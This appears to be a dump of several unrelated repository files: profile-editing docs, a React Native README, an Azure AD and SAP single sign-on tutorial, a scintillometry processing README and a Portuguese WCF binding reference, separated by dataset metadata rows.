<td>You can add or edit details viz. - Profile Summary <br>1. Enter <b>Description</b> <br>2. You can show or hide your description to others <br>3. Click <b>Save</b> to save the description <br>4. Click <b>Close</b> to exit the page</td>
<td><img src="pages/features-documentation/images/profile_summary.png"></td>
</tr>
</table>
### Viewing Certifications and Awards
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td>The badges are added in your profile after the completion of a course</td>
<td><img src="pages/features-documentation/images/badges.png"></td>
</tr>
</table>
### Adding or Editing Profile Details
<table>
<tr>
<th style="width:35%;">Step</th>
<th style="width:65%;">Screen</th>
</tr>
<tr>
<td><b>Experience</b> <br>Add or edit your experience details, such as work title, organization, designation, joining date, subject taught etc. You can show or hide your experience details from others</td>
<td><img src="pages/features-documentation/images/profile_experience.png"></td>
</tr>
<tr>
<td><b>Address</b> <br>Add or edit your permanent or current address. You can show or hide the address details from others</td>
<td><img src="pages/features-documentation/images/profile_address.png"></td>
</tr>
<tr>
<td><b>Education</b> <br>Add or edit your academic qualifications, such as degree, year of passing, percentage, board/university, etc. You can show or hide your academic details from others</td>
<td><img src="pages/features-documentation/images/profile_education.png"></td>
</tr>
<tr>
<td><b>Skill Tags</b> <br>1. Click <b>Edit</b> <br>2. You can show or hide your skill details from others <br>3. Select the skill set that you want to add from the drop down <br>4. Click <b>Save</b> to save the details <br>
<td><img src="pages/features-documentation/images/profile/skill.png"></td>
</tr>
<tr>
<td><b>Skill Endorsement</b> <br>1. Click <b>View More</b> dropdown in <b>Skill Tags</b> section <br>2. Click <b>+</b> icon to endorse for a particular skill <br>3. Click <b>View Less</b> to collapse the Skill Tags page</td>
<td><img src="pages/features-documentation/images/profile_endorsment.png"></td>
</tr>
<tr>
<td><b>Additional Information</b> <br>1. Add or edit personal information such as name, phone number, date of birth, location, languages known, etc <br>2. Add your <b>Social Media Links</b> such as Facebook, Twitter, LinkedIn etc <br>3. Click <b>Save</b> button to save the changes</td>
<td><img src="pages/features-documentation/images/profile_additionalinfo.png"></td>
</tr>
</table>
| 48.695035 | 492 | 0.682348 | eng_Latn | 0.884234 |
977ed4e98e690a80e9cadc76fa6e55dd8f2c3eec | 1,750 | md | Markdown | README.md | thiagoblima/color-catalog | eda4e988febd95508be8c4d84fb7cabee4041d9b | [
"MIT"
] | null | null | null | README.md | thiagoblima/color-catalog | eda4e988febd95508be8c4d84fb7cabee4041d9b | [
"MIT"
] | 4 | 2020-09-19T01:45:10.000Z | 2020-09-20T02:05:32.000Z | README.md | thiagoblima/color-catalog | eda4e988febd95508be8c4d84fb7cabee4041d9b | [
"MIT"
] | null | null | null | # Color Catalog - React Native
> A React Native studying and experiments repository written for general purpose and knowledge spreading.

## Expo
This repository uses *Expo*, here goes the its link:
> https://expo.io/learn
Builing native apps for _IOS_ and _Android_ with *React Native*:
1. First of all it's needed to get *Expo CLI* installed:
```
npm install expo-cli --global
```
2. Adding _React Navigation_ to the project:
```
npm install @react-navigation/native
```
3. Adding _Expo/ReactNative_ dependencies:
```
expo install react-native-gesture-handler react-native-reanimated react-native-screens react-native-safe-area-context @react-native-community/masked-view
```
4. It should be all good to get it started through the pretty wellknown command:
```
npm start
```
## Release History
* 0.2.1
* CHANGE: Update docs (module code remains unchanged)
* 0.2.0
* CHANGE: Remove `setDefaultXYZ()`
* ADD: Add `init()`
* 0.1.1
* FIX: Crash when calling `baz()` (Thanks @GenerousContributorName!)
* 0.1.0
* The first proper release
* CHANGE: Rename `foo()` to `bar()`
* 0.0.1
* Work in progress
## Meta
Thiago Lima
Distributed under the XYZ license. See ``LICENSE`` for more information.
[https://github.com/thiagoblima/color-catalog/blob/master/LICENSE](https://github.com/thiagoblima/color-catalog/blob/master/LICENSE)
## Contributing
1. Fork it (<https://github.com/thiagoblima/color-catalog/fork>)
2. Create your feature branch (`git checkout -b feature/fooBar`)
3. Commit your changes (`git commit -am 'Add some fooBar'`)
4. Push to the branch (`git push origin feature/fooBar`)
5. Create a new Pull Request
[wiki]: https://github.com/thiagoblima/color-catalog/wiki | 25 | 153 | 0.722857 | eng_Latn | 0.810287 |
977f609d73d8e16a053f1da531dea5f6b19ba5a3 | 419 | md | Markdown | _portfolio/portfolio-2.md | arvindsaripalli/arvindsaripalli.github.io | 176c82ce936db30360f6420ea9aa404311e9d22f | [
"MIT"
] | null | null | null | _portfolio/portfolio-2.md | arvindsaripalli/arvindsaripalli.github.io | 176c82ce936db30360f6420ea9aa404311e9d22f | [
"MIT"
] | null | null | null | _portfolio/portfolio-2.md | arvindsaripalli/arvindsaripalli.github.io | 176c82ce936db30360f6420ea9aa404311e9d22f | [
"MIT"
] | null | null | null | ---
title: "Reordering Spotify Playlists"
excerpt: "What's the best order to listen your playlists or music library in?"
collection: portfolio
---
[Spotiflow](https://github.com/arvindsaripalli/Spotiflow) is a program that lets you reorganize
the order of your playlists <en>optimally</en>. It does this by picking songs that are <en>closest</en>
to each other based on song meta data.
Hacked together at SDHacks 2017. | 41.9 | 103 | 0.77327 | eng_Latn | 0.998273 |
977fb85416164be4bd84ff6a52cac88987944863 | 961 | md | Markdown | docs/introduction.md | jkratz55/spring-cqrs-arch | 31ec5665bde368091b79434b5eae5edeeb5c7805 | [
"Apache-2.0"
] | 23 | 2018-01-17T09:03:48.000Z | 2021-10-04T19:38:56.000Z | docs/introduction.md | jkratz55/spring-cqrs-arch | 31ec5665bde368091b79434b5eae5edeeb5c7805 | [
"Apache-2.0"
] | 7 | 2019-01-07T03:31:07.000Z | 2022-01-02T16:29:11.000Z | docs/introduction.md | jkratz55/spring-cqrs-arch | 31ec5665bde368091b79434b5eae5edeeb5c7805 | [
"Apache-2.0"
] | 11 | 2018-10-06T15:06:13.000Z | 2022-03-25T15:10:03.000Z | ---
title: Introduction
permalink: /introduction/
layout: default
description: "Presentation of the Framework"
---
# To conceive an application using CQRS, you need to think this way :
* *What are my use cases* : define your use-cases expressed as operation s(READ or Write) or eventually a sequence flow diagram per use-case
* *Distinguish your write access* : for example create a new user, edit his phone number. Avoid as much as possible generic and poor business meaning operations as CRUD (Create, Update, Delete). Think about what are you trying to update ? His personal details ? Are you toggling the email configuration flag ? Obviously all operations are a write and could be written as a big Update method. Cqrs is enforcing the DDD approach. Meaning is a rule to write better application toward functional design rather than technical design and to increase the productivity.
* *Start by writing your commands* : that is the easiest part
| 64.066667 | 562 | 0.777315 | eng_Latn | 0.999378 |
977ffa311359796d1c98a96bce18f09782fe73e0 | 17,981 | md | Markdown | articles/active-directory/active-directory-saas-sap-hana-cloud-platform-identity-authentication-tutorial.md | eimajtrebor/azure-docs | 5f7145b406f91caeac7f1bef4b99af5d46927cc0 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/active-directory/active-directory-saas-sap-hana-cloud-platform-identity-authentication-tutorial.md | eimajtrebor/azure-docs | 5f7145b406f91caeac7f1bef4b99af5d46927cc0 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2020-10-19T20:02:24.000Z | 2020-10-19T20:02:24.000Z | articles/active-directory/active-directory-saas-sap-hana-cloud-platform-identity-authentication-tutorial.md | eimajtrebor/azure-docs | 5f7145b406f91caeac7f1bef4b99af5d46927cc0 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-09-24T21:20:47.000Z | 2020-10-20T17:45:07.000Z | ---
title: 'Tutorial: Azure Active Directory integration with SAP Cloud Platform Identity Authentication | Microsoft Docs'
description: Learn how to configure single sign-on between Azure Active Directory and SAP Cloud Platform Identity Authentication.
services: active-directory
documentationCenter: na
author: jeevansd
manager: femila
ms.reviewer: joflore
ms.assetid: 1c1320d1-7ba4-4b5f-926f-4996b44d9b5e
ms.service: active-directory
ms.workload: identity
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: article
ms.date: 09/20/2017
ms.author: jeedes
---
# Tutorial: Azure Active Directory integration with SAP Cloud Platform Identity Authentication
In this tutorial, you learn how to integrate SAP Cloud Platform Identity Authentication with Azure Active Directory (Azure AD). SAP Cloud Platform Identity Authentication is used as a proxy IdP to access SAP applications using Azure AD as the main IdP.
Integrating SAP Cloud Platform Identity Authentication with Azure AD provides you with the following benefits:
- You can control in Azure AD who has access to SAP Application.
- You can enable your users to automatically get signed-on to SAP applications single sign-on (SSO)) with their Azure AD accounts.
- You can manage your accounts in one central location - the Azure portal.
If you want to know more details about SaaS app integration with Azure AD, see [what is application access and single sign-on with Azure Active Directory](active-directory-appssoaccess-whatis.md).
## Prerequisites
To configure Azure AD integration with SAP Cloud Platform Identity Authentication, you need the following items:
- An Azure AD subscription
- An SAP Cloud Platform Identity Authentication single sign-on enabled subscription
> [!NOTE]
> To test the steps in this tutorial, we do not recommend using a production environment.
To test the steps in this tutorial, you should follow these recommendations:
- Do not use your production environment, unless it is necessary.
- If you don't have an Azure AD trial environment, you can [get a one-month trial](https://azure.microsoft.com/pricing/free-trial/).
## Scenario description
In this tutorial, you test Azure AD single sign-on in a test environment.
The scenario outlined in this tutorial consists of two main building blocks:
1. Adding SAP Cloud Platform Identity Authentication from the gallery
2. Configuring and testing Azure AD single sign-on
Before diving into the technical details, it is vital to understand the concepts you're going to look at. The SAP Cloud Platform Identity Authentication and Azure Active Directory federation enables you to implement SSO across applications or services protected by AAD (as an IdP) with SAP applications and services protected by SAP Cloud Platform Identity Authentication.
Currently, SAP Cloud Platform Identity Authentication acts as a Proxy Identity Provider to SAP-applications. Azure Active Directory in turn acts as the leading Identity Provider in this setup.
The following diagram illustrates this:

With this setup, your SAP Cloud Platform Identity Authentication tenant will be configured as a trusted application in Azure Active Directory.
All SAP applications and services you want to protect through this way are subsequently configured in the SAP Cloud Platform Identity Authentication management console!
This means that authorization for granting access to SAP applications and services needs to take place in SAP Cloud Platform Identity Authentication for such a setup (as opposed to configuring authorization in Azure Active Directory).
By configuring SAP Cloud Platform Identity Authentication as an application through the Azure Active Directory Marketplace, you don't need to take care of configuring needed individual claims / SAML assertions and transformations needed to produce a valid authentication token for SAP applications.
>[!NOTE]
>Currently Web SSO has been tested by both parties, only. Flows needed for App-to-API or API-to-API communication should work but have not been tested, yet. They will be tested as part of subsequent activities.
>
## Adding SAP Cloud Platform Identity Authentication from the gallery
To configure the integration of SAP Cloud Platform Identity Authentication into Azure AD, you need to add SAP Cloud Platform Identity Authentication from the gallery to your list of managed SaaS apps.
**To add SAP Cloud Platform Identity Authentication from the gallery, perform the following steps:**
1. In the **[Azure portal](https://portal.azure.com)**, on the left navigation panel, click **Azure Active Directory** icon.
![The Azure Active Directory button][1]
2. Navigate to **Enterprise applications**. Then go to **All applications**.
![The Enterprise applications blade][2]
3. To add new application, click **New application** button on the top of dialog.
![The New application button][3]
4. In the search box, type **SAP Cloud Platform Identity Authentication**, select **SAP Cloud Platform Identity Authentication** from result panel then click **Add** button to add the application.

## Configure and test Azure AD single sign-on
In this section, you configure and test Azure AD single sign-on with SAP Cloud Platform Identity Authentication based on a test user called "Britta Simon".
For single sign-on to work, Azure AD needs to know what the counterpart user in SAP Cloud Platform Identity Authentication is to a user in Azure AD. In other words, a link relationship between an Azure AD user and the related user in SAP Cloud Platform Identity Authentication needs to be established.
In SAP Cloud Platform Identity Authentication, assign the value of the **user name** in Azure AD as the value of the **Username** to establish the link relationship.
To configure and test Azure AD single sign-on with SAP Cloud Platform Identity Authentication, you need to complete the following building blocks:
1. **[Configure Azure AD Single Sign-On](#configure-azure-ad-single-sign-on)** - to enable your users to use this feature.
2. **[Create an Azure AD test user](#create-an-azure-ad-test-user)** - to test Azure AD single sign-on with Britta Simon.
3. **[Create an SAP Cloud Platform Identity Authentication test user](#create-an-sap-cloud-platform-identity-authentication-test-user)** - to have a counterpart of Britta Simon in SAP Cloud Platform Identity Authentication that is linked to the Azure AD representation of user.
4. **[Assign the Azure AD test user](#assign-the-azure-ad-test-user)** - to enable Britta Simon to use Azure AD single sign-on.
5. **[Test single sign-on](#test-single-sign-on)** - to verify whether the configuration works.
### Configure Azure AD single sign-on
In this section, you enable Azure AD single sign-on in the Azure portal and configure single sign-on in your SAP Cloud Platform Identity Authentication application.
**To configure Azure AD single sign-on with SAP Cloud Platform Identity Authentication, perform the following steps:**
1. In the Azure portal, on the **SAP Cloud Platform Identity Authentication** application integration page, click **Single sign-on**.
![Configure single sign-on link][4]
2. On the **Single sign-on** dialog, select **Mode** as **SAML-based Sign-on** to enable single sign-on.

3. On the **SAP Cloud Platform Identity Authentication Domain and URLs** section, If you wish to configure the application in **IDP** initiated mode:

In the **Identifier** textbox, type a URL using the following pattern: `https://<entity-id>.accounts.ondemand.com`
> [!NOTE]
> This value is not real. Update this value with the actual Identifier. Contact [SAP Cloud Platform Identity Authentication Client support team](https://cloudplatform.sap.com/capabilities/security/trustcenter.html) to get this value. If you don't know this value, please follow the SAP Cloud Platform Identity Authentication documentation on [Tenant SAML 2.0 Configuration](https://help.hana.ondemand.com/cloud_identity/frameset.htm?e81a19b0067f4646982d7200a8dab3ca.html).
4. Check **Show advanced URL settings**. If you wish to configure the application in **SP** initiated mode:

In the **Sign On URL** textbox, type a URL using the following pattern: `https://<entity-id>.accounts.ondemand.com/admin`
> [!NOTE]
> This value is not real. Update this value with the actual Sign-On URL. Contact [SAP Cloud Platform Identity Authentication Client support team](https://cloudplatform.sap.com/capabilities/security/trustcenter.html) to get this value.
5. On the **SAML Signing Certificate** section, click **Metadata XML** and then save the metadata file on your computer.

6. SAP Cloud Platform Identity Authentication application expects the SAML assertions in a specific format. You can manage the values of these attributes from the "**User Attributes**" section on application integration page. The following screenshot shows an example for this.

7. In the **User Attributes** section on the **Single sign-on** dialog, if your SAP application expects an attribute for example "firstName". On the SAML token attributes dialog, add the "firstName" attribute.
a. Click **Add attribute** to open the **Add Attribute** dialog.


b. In the **Name** textbox, type the attribute name "firstName".
c. From the **Value** list, select the attribute value "user.givenname".
d. Click **Ok**.
8. Click **Save** button.

9. On the **SAP Cloud Platform Identity Authentication Configuration** section, click **Configure SAP Cloud Platform Identity Authentication** to open **Configure sign-on** window. Copy the **Sign-Out URL, SAML Entity ID, and SAML Single Sign-On Service URL** from the **Quick Reference section.**

10. To get SSO configured for your application, go to SAP Cloud Platform Identity Authentication Administration Console. The URL has the following pattern: `https://<tenant-id>.accounts.ondemand.com/admin`. Then, follow the documentation on SAP Cloud Platform Identity Authentication to [Configure Microsoft Azure AD as Corporate Identity Provider at SAP Cloud Platform Identity Authentication](https://help.hana.ondemand.com/cloud_identity/frameset.htm?626b17331b4d4014b8790d3aea70b240.html).
11. In the Azure portal, click **Save** button.
12. Continue the following steps only if you want to add and enable SSO for another SAP application. Repeat steps under the section “Adding SAP Cloud Platform Identity Authentication from the gallery” to add another instance of SAP Cloud Platform Identity Authentication.
13. In the Azure portal, on the **SAP Cloud Platform Identity Authentication** application integration page, click **Linked Sign-on**.

14. Save the configuration.
>[!NOTE]
>The new application will leverage the SSO configuration for the previous SAP application. Please make sure you use the same Corporate Identity Providers in the SAP Cloud Platform Identity Authentication Administration Console.
> [!TIP]
> You can now read a concise version of these instructions inside the [Azure portal](https://portal.azure.com), while you are setting up the app! After adding this app from the **Active Directory > Enterprise Applications** section, simply click the **Single Sign-On** tab and access the embedded documentation through the **Configuration** section at the bottom. You can read more about the embedded documentation feature here: [Azure AD embedded documentation]( https://go.microsoft.com/fwlink/?linkid=845985)
>
### Create an Azure AD test user
The objective of this section is to create a test user in the Azure portal called Britta Simon.
![Create an Azure AD test user][100]
**To create a test user in Azure AD, perform the following steps:**
1. In the Azure portal, in the left pane, click the **Azure Active Directory** button.

2. To display the list of users, go to **Users and groups**, and then click **All users**.

3. To open the **User** dialog box, click **Add** at the top of the **All Users** dialog box.

4. In the **User** dialog box, perform the following steps:

a. In the **Name** box, type **BrittaSimon**.
b. In the **User name** box, type the email address of user Britta Simon.
c. Select the **Show Password** check box, and then write down the value that's displayed in the **Password** box.
d. Click **Create**.
### Create an SAP Cloud Platform Identity Authentication test user
You don't need to create an user on SAP Cloud Platform Identity Authentication. Users who are in the Azure AD user store can use the SSO functionality.
SAP Cloud Platform Identity Authentication supports the Identity Federation option. This option allows the application to check if the users authenticated by the corporate identity provider exist in the user store of SAP Cloud Platform Identity Authentication.
In the default setting, the Identity Federation option is disabled. If Identity Federation is enabled, only the users that are imported in SAP Cloud Platform Identity Authentication are able to access the application.
For more information about how to enable or disable Identity Federation with SAP Cloud Platform Identity Authentication, see Enable Identity Federation with SAP Cloud Platform Identity Authentication in [Configure Identity Federation with the User Store of SAP Cloud Platform Identity Authentication](https://help.hana.ondemand.com/cloud_identity/frameset.htm?c029bbbaefbf4350af15115396ba14e2.html).
### Assign the Azure AD test user
In this section, you enable Britta Simon to use Azure single sign-on by granting access to SAP Cloud Platform Identity Authentication.
![Assign the user role][200]
**To assign Britta Simon to SAP Cloud Platform Identity Authentication, perform the following steps:**
1. In the Azure portal, open the applications view, and then navigate to the directory view and go to **Enterprise applications** then click **All applications**.
![Assign User][201]
2. In the applications list, select **SAP Cloud Platform Identity Authentication**.

3. In the menu on the left, click **Users and groups**.
![The "Users and groups" link][202]
4. Click **Add** button. Then select **Users and groups** on **Add Assignment** dialog.
![The Add Assignment pane][203]
5. On **Users and groups** dialog, select **Britta Simon** in the Users list.
6. Click **Select** button on **Users and groups** dialog.
7. Click **Assign** button on **Add Assignment** dialog.
### Test single sign-on
In this section, you test your Azure AD single sign-on configuration using the Access Panel.
When you click the SAP Cloud Platform Identity Authentication tile in the Access Panel, you should get automatically signed-on to your SAP Cloud Platform Identity Authentication application.
For more information about the Access Panel, see [Introduction to the Access Panel](active-directory-saas-access-panel-introduction.md).
## Additional resources
* [List of Tutorials on How to Integrate SaaS Apps with Azure Active Directory](active-directory-saas-tutorial-list.md)
* [What is application access and single sign-on with Azure Active Directory?](active-directory-appssoaccess-whatis.md)
<!--Image references-->
[1]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_01.png
[2]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_02.png
[3]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_03.png
[4]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_04.png
[100]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_100.png
[200]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_200.png
[201]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_201.png
[202]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_202.png
[203]: ./media/active-directory-saas-sapcloudauth-tutorial/tutorial_general_203.png
| 62.003448 | 512 | 0.787164 | eng_Latn | 0.923304 |
97807488e4e3648203e651a4d41d239be18c5ff2 | 241 | md | Markdown | _provenance/7327.md | brueghelfamily/brueghelfamily.github.io | a73351ac39b60cd763e483c1f8520f87d8c2a443 | [
"MIT"
] | null | null | null | _provenance/7327.md | brueghelfamily/brueghelfamily.github.io | a73351ac39b60cd763e483c1f8520f87d8c2a443 | [
"MIT"
] | null | null | null | _provenance/7327.md | brueghelfamily/brueghelfamily.github.io | a73351ac39b60cd763e483c1f8520f87d8c2a443 | [
"MIT"
] | null | null | null | ---
pid: '7327'
object_pid: '9644'
label: Three Windmills (London)
artist: janbrueghel
provenance_date: '1983'
provenance_location: Cambridge, MA
provenance_text: Gift from Woodner to Fogg Art Museum
collection: provenance
order: '2156'
---
| 20.083333 | 53 | 0.771784 | yue_Hant | 0.640467 |
97832c6f46812a0a4262afebbf9f52f5102c98bb | 3,152 | md | Markdown | README.md | gampnico/ss19-feldkurs | 63bb45bca1c97210705b8dd36489dc7d22a63c7d | [
"Apache-2.0"
] | 7 | 2020-10-19T07:48:28.000Z | 2022-01-15T01:06:26.000Z | README.md | gampnico/ss19-feldkurs | 63bb45bca1c97210705b8dd36489dc7d22a63c7d | [
"Apache-2.0"
] | null | null | null | README.md | gampnico/ss19-feldkurs | 63bb45bca1c97210705b8dd36489dc7d22a63c7d | [
"Apache-2.0"
] | 1 | 2020-11-12T09:07:25.000Z | 2020-11-12T09:07:25.000Z | # Processing Scintillometry Data in Complex Terrain
A suite of tools for computing sensible heat fluxes from the BLS450 scintillometer and working with 2D flux footprints.
This project formed part of a scintillometry field course. Due to licensing constraints, some dependencies are not satisfied by this repository alone. These are indicated below.
## 1. Features
### 1.1 Scintillometry
- Parses scintillometry data from BLS450 scintillometer.
- Processes this data and computes sensible heat fluxes.
- Processes topographical data.
- Processes InnFlux and HATPRO data.
- Produces plots of scintillometer data, path topography, and weather data.
### 1.2 Footprint Climatology
- Processes 2D flux footprints generated by Natascha Kljun's online model, available [here](http://footprint.kljun.net/).
- Makes individual topographical adjustments and stitches footprints together.
- Overlays stitched footprints onto map.
## 2. Workflow
Running scripts directly from the console will cause errors. Not all data and dependences are available in this repository, and some of the scripts must be tailored to each individual project, notably station parameters and the times when the boundary layer switches from stable to unstable regimes.
The results of working examples are found in `Scintillometry Processing.ipynb` and `Footprint Rasters.ipynb`. The field course report and analysis is not available.
Before beginning, use [DGM 5m data](https://www.data.gv.at/katalog/dataset/digitales-gelandemodell-des-landes-salzburg-5m) to generate topographical data for the scintillometer's path coordinates. Then, use `core_path_calculator.m` to generate path transects. These are also necessary for calibrating the scintillometer.
**Scintillometer path coordinates must be accurate. Incorrectly generated topographical data leads to poor calibration and nonsense results!**
### 2.1 Scintillometry
An example of scintillometry processing can be found in `Scintillometry Processing.ipynb`.
1. Use `data_parser.py` to parse scintillometer and weather data.
2. Use `cn_derivations.data_processor()` to derive $Cn^{2}$. Make sure to enter the correct regime switch time.
3. Use `r_function_port.ward_method()`, a Python port of Helen Ward's code, to compute the Obukhov length and sensible heat flux.
4. Use the functions in `prettyplot.py` to visualise data.
### 2.2 Path Footprint Climatology
Some example code is given in `Footprint Rasters.ipynb`, but individual adjustments are necessary.
1. Generate footprints for entire path length either by using the online 2D FFP tool, or the FFP_clim function provided by Natascha Kljun.
2. Generate xllcenter, yllcenter coordinates for each footprint.
2. Determine the resolution and cell size of each generated footprint via the MATLAB engine for Python.
3. Calculate xllcorner,yllcorner coordinates:
> `xllcorner = xllcenter - (nrow * cellsize)/2`
4. Generate ASCII raster files, inserting correct coordinates.
5. Generate TIFF files, apply weighting functions to each TIFF.
6. Mosaic and average TIFF files in R, generate final contour.
7. Layer contour plot over map (e.g. with QGIS).
| 55.298246 | 320 | 0.796637 | eng_Latn | 0.987661 |
978369cf6d175b36b3b3cebf23a1987c8a1a22cc | 11,178 | md | Markdown | docs/framework/configure-apps/file-schema/wcf/ws2007httpbinding.md | douglasbreda/docs.pt-br | f92e63014d8313d5e283db2e213380375cea9a77 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/configure-apps/file-schema/wcf/ws2007httpbinding.md | douglasbreda/docs.pt-br | f92e63014d8313d5e283db2e213380375cea9a77 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/configure-apps/file-schema/wcf/ws2007httpbinding.md | douglasbreda/docs.pt-br | f92e63014d8313d5e283db2e213380375cea9a77 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: '<ws2007HttpBinding>'
ms.date: 03/30/2017
ms.assetid: 8586ecc9-bdaa-44d6-8d4d-7038e4ea1741
ms.openlocfilehash: 9e47bae28be6f42858fabb5b0648b60415bb5cbb
ms.sourcegitcommit: efff8f331fd9467f093f8ab8d23a203d6ecb5b60
ms.translationtype: MT
ms.contentlocale: pt-BR
ms.lasthandoff: 09/01/2018
ms.locfileid: "43392752"
---
# <a name="ltws2007httpbindinggt"></a><ws2007HttpBinding>
Define uma associação interoperável que fornece suporte para as versões corretas dos <xref:System.ServiceModel.WSHttpBinding.Security%2A>, <xref:System.ServiceModel.ReliableSession>, e <xref:System.ServiceModel.WSHttpBindingBase.TransactionFlow%2A> elementos de associação.
\<system.serviceModel>
\<associações >
\<ws2007HttpBinding>
## <a name="syntax"></a>Sintaxe
```xml
<ws2007HttpBinding>
<binding
allowCookies="Boolean"
bypassProxyOnLocal="Boolean"
closeTimeout="TimeSpan"
hostNameComparisonMode="StrongWildCard/Exact/WeakWildcard"
maxBufferPoolSize="integer"
maxReceivedMessageSize="Integer"
messageEncoding="Text/Mtom"
name="string"
openTimeout="TimeSpan"
proxyAddress="URI"
receiveTimeout="TimeSpan"
sendTimeout="TimeSpan"
textEncoding="UnicodeFffeTextEncoding/Utf16TextEncoding/Utf8TextEncoding"
transactionFlow="Boolean"
useDefaultWebProxy="Boolean">
<reliableSession ordered="Boolean"
inactivityTimeout="TimeSpan"
enabled="Boolean" />
<security mode="Message/None/Transport/TransportWithCredential">
<transport clientCredentialType="Basic/Certificate/Digest/None/Ntlm/Windows"
proxyCredentialType="Basic/Digest/None/Ntlm/Windows"
realm="string"
/>
<message clientCredentialType ="Certificate/IssuedToken/None/UserName/Windows"
negotiateServiceCredential="Boolean"
algorithmSuite="Basic128/Basic192/Basic256/Basic128Rsa15/Basic256Rsa15/TripleDes/TripleDesRsa15/Basic128Sha256/Basic192Sha256/TripleDesSha256/Basic128Sha256Rsa15/Basic192Sha256Rsa15/Basic256Sha256Rsa15/TripleDesSha256Rsa15"
establishSecurityContext="Boolean"
negotiateServiceCredential="Boolean"/>
</security>
<readerQuotas maxArrayLength="Integer" maxBytesPerRead="Integer" maxDepth="Integer" maxNameTableCharCount="Integer" maxStringContentLength="Integer" /> </binding>
</ws2007HttpBinding>
```
## <a name="attributes-and-elements"></a>Atributos e elementos
As seções a seguir descrevem atributos, elementos filho e elementos pai.
### <a name="attributes"></a>Atributos
|Atributo|Descrição|
|---------------|-----------------|
|`allowCookies`|Um valor que indica se o cliente aceita cookies e propaga-os em solicitações futuras. O padrão é `false`.<br /><br /> Você pode usar essa propriedade quando você interage com serviços Web do ASP.NET (ASMX) que usam cookies. Isso garante que os cookies que o servidor retorna são copiados automaticamente para todas as solicitações futuras de cliente para o serviço.|
|`bypassProxyOnLocal`|Um valor que indica se deve ignorar o servidor proxy para endereços locais. O padrão é `false`.|
|`closeTimeout`|Um <xref:System.TimeSpan> valor que especifica o intervalo de tempo para concluir uma operação de fechamento. Esse valor deve ser maior que ou igual a <xref:System.TimeSpan.Zero>. O padrão é 01:00:00.|
|`hostnameComparisonMode`|Especifica o modo de comparação de nome de host HTTP usado para analisar os identificadores de recurso uniformes (URIs). Esse atributo é do tipo <xref:System.ServiceModel.HostNameComparisonMode>, que indica se o nome do host é usado para acessar o serviço ao fazer a correspondência no URI. O valor padrão é <xref:System.ServiceModel.HostNameComparisonMode.StrongWildcard>, que ignora o nome do host na correspondência.|
|`maxBufferPoolSize`|O tamanho do pool de buffer máximo para esta associação. O padrão é 524.288 bytes (512 × 1.024). Muitas partes do Windows Communication Foundation (WCF) usam buffers. Criação e destruição de buffers de cada vez que elas são usadas é caro, assim como a coleta de lixo para buffers. Com os pools de buffer, usar um buffer do pool, usá-lo e retorná-lo ao pool quando terminar. Isso evita a sobrecarga na criação e destruição de buffers.|
|`maxReceivedMessageSize`|O tamanho máximo da mensagem, em bytes, incluindo os cabeçalhos, que pode ser receber um canal configurado com essa associação. O remetente de uma mensagem exceder esse limite recebe uma falha de SOAP. O receptor descartará a mensagem e cria uma entrada do evento no log de rastreamento. O padrão é 65536.|
|`messageEncoding`|Define o codificador usado para codificar a mensagem. Os valores válidos incluem o seguinte:<br /><br /> - `Text`: Use um codificador de mensagem de texto.<br />- `Mtom`: Use um codificador de organização mecanismo 1.0 MTOM (Message Transmission).<br /><br /> O padrão é `Text`.<br /><br /> Esse atributo é do tipo <xref:System.ServiceModel.WSMessageEncoding>.|
|`name`|O nome da configuração da associação. Esse valor deve ser exclusivo porque ele é usado como identificação para a associação. Começando com [!INCLUDE[netfx40_short](../../../../../includes/netfx40-short-md.md)], associações e comportamentos não precisam ter um nome. Para obter mais informações sobre a configuração padrão e sem nome associações e comportamentos, consulte [configuração simplificado](../../../../../docs/framework/wcf/simplified-configuration.md) e [configuração simplificada para serviços WCF](../../../../../docs/framework/wcf/samples/simplified-configuration-for-wcf-services.md).|
|`openTimeout`|Um <xref:System.TimeSpan> valor que especifica o intervalo de tempo fornecido para a conclusão de uma operação open. Esse valor deve ser maior que ou igual a <xref:System.TimeSpan.Zero>. O padrão é 01:00:00.|
|`proxyAddress`|Um URI que especifica o endereço do proxy HTTP. Se `useSystemWebProxy` está `true`, essa configuração deve ser `null`. O padrão é `null`.|
|`receiveTimeout`|Um <xref:System.TimeSpan> valor que especifica o intervalo de tempo fornecido para uma operação de recebimento ser concluída. Esse valor deve ser maior que ou igual a <xref:System.TimeSpan.Zero>. O padrão é 01:00:00.|
|`sendTimeout`|Um <xref:System.TimeSpan> valor que especifica o intervalo de tempo fornecido para uma operação de envio ser concluída. Esse valor deve ser maior que ou igual a <xref:System.TimeSpan.Zero>. O padrão é 01:00:00.|
|`textEncoding`|Especifica a codificação a ser usada para emitir mensagens na associação de conjunto de caracteres. Os valores válidos incluem o seguinte:<br /><br /> - `UnicodeFffeTextEncoding`: Unicode Big Endian codificação.<br />- `Utf16TextEncoding`: codificação de 16 bits.<br />- `Utf8TextEncoding`: codificação de 8 bits.<br /><br /> O padrão é `Utf8TextEncoding`.<br /><br /> Esse atributo é do tipo <xref:System.Text.Encoding>.|
|`transactionFlow`|Um valor que especifica se a associação dá suporte a fluxo de WS-Transactions. O padrão é `false`.|
|`useDefaultWebProxy`|Um valor que especifica se o proxy HTTP configurado automaticamente do sistema é usado. O padrão é `true`.|
### <a name="child-elements"></a>Elementos filho
|Elemento|Descrição|
|-------------|-----------------|
|[\<security>](../../../../../docs/framework/configure-apps/file-schema/wcf/security-of-wshttpbinding.md)|Define as configurações de segurança para a associação. Esse elemento é do tipo <xref:System.ServiceModel.Configuration.WSHttpSecurityElement>.|
